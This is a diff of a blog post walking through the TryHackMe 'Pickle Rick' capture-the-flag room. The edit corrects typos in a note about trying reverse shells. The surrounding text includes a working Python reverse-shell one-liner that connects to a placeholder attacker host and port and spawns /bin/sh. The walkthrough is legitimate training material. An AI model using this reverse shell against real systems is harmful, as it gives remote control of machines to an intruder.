jrknox1977/jrknox1977.github.io/_posts/2022-07-24-THM_pickle_rick_walkthrough.md

 Now that we know that python3 executes we can try to pop a shell!
 Let's try this one.
 DON'T FORGET TO CHAGNE YOUR HOST IP AND PORT in the command! :)

-By the way, I tryied few different reverse sheels the one below may not always work, but it did here.
+By the way, I tried few different reverse shells.
+The one below may not always work, but it did here.
+Many times you will have to experiment to discover with will work on a given box.

 ```bash
 export RHOST="xx.xx.xx.xx";export RPORT=xxxx;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'